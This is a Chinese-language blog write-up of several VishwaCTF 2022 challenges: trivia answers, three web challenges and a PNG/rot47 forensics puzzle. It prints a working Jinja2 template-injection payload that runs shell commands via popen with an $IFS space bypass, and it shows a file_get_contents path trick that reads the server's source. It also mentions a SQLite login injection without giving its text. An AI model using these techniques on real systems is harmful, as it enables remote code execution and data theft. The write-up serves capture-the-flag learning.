IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> VishwaCTF 2022 部分writeup -> 正文阅读

[系统运维]VishwaCTF 2022 部分writeup

在这里插入图片描述

本文来自csdn的??shu天??,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ?ω? @)ノ!!

因为我开始做的时候只有两三个小时了,摸了一些简单题

General

Trivia 1

This is a Debian-derived Linux distribution managed and funded by Offensive Security If there are any spaces, use an “_” instead of it.

Kali Linux 由 Debian 派生的 Linux 发行版,由 Offensive Security 管理和资助。

vishwaCTF{Kali_Linux}

Trivia 2

Who coined the term virus in computer?Name any one. If there are any spaces, use an “_” instead of it.

vishwaCTF{Len_Adleman}
1983 年 11 月 3 日,弗雷德·科恩 (Fred Cohen) 博士研制出一种在运行过程中可以复制自身的破坏性程序,伦·艾德勒曼 (Len Adleman) 将它命名为计算机病毒(computer viruses),并在每周一次的计算机安全讨论会上正式提出。

Trivia 3

The first virus to infect Windows 95 files is If there are any spaces, use an “_” instead of it.

Windows 95下的第一个病毒程序Boza,出自澳大利亚一个叫VLAD的组织。

vishwaCTF{Boza}


Web

Hey Buddy!

Hey Buddy, Give me your name I will display your name on my website. Yes exactly, there is nothing in this website.

{{8*9}} →72 

在这里插入图片描述
啥过滤没有
payload:

{{''.__class__.__mro__[1].__subclasses__()[133].__init__.__globals__['popen']("nl$IFS*").read()}}

这里的执行命令时候,空格怎么都不行,所以用$IFS替代,但是flag.txt又读不出来,干脆读了所有文件
在这里插入图片描述


Stock Bot

We have our online shop of computer related accessories. So for easy customer interaction we have made a stock bot which will give you how many units of enlisted products are available.

在这里插入图片描述
抓包看看,发现机器人会报错
在这里插入图片描述
他是用file_get_contents()读取的,可以把他的源码取下来

GET /Products/check.php?product=check.php
<?php
if(isset($_GET['product'])){
        $product = $_GET['product'];
        header('Content-type: application\/json');
        if(strpos($product,'Flag')){
                    $data = array('Flag' => file_get_contents($product));
        }
        else{
                    $data = array('Quantity' => file_get_contents($product));
        }
        echo json_encode($data);
}
?>

所以传flag可以直接读到
在这里插入图片描述


My Useless Website

Description - I made this website having simple authentication used in it. But unfortunately I forgot the credentials. Can you help me to find the correct one ??

看报错是SQLite数据库注入
鬼鬼注入一下就出来了
在这里插入图片描述


Forensic

Keep the flag high

The great Pirate Narao Gosco has your flag but pirates are hard to fight. Can you rotate the ch4n7es in your favor?

首先是bmp修复

89 50 4E 47 0D 0A 1A 0A 

在这里插入图片描述
得到一张二维码
在这里插入图片描述
扫描得到pirate.jpeg
在这里插入图片描述
这张图片 FF D9 结尾后有一段冗余数据,分离出来是ascii码
在这里插入图片描述

trYAB_9
NDF_:5bE0D:0d4:D?bC_7Lu%r2H9D:'
IEND

rot47解密后倒转即是flag(题目描述中的 rotate 也是提示我们是rot系列解密)
在这里插入图片描述

本文来自csdn的??shu天??,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ?ω? @)ノ!!

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-03-24 00:59:27  更:2022-03-24 01:02:32 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 23:26:14-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码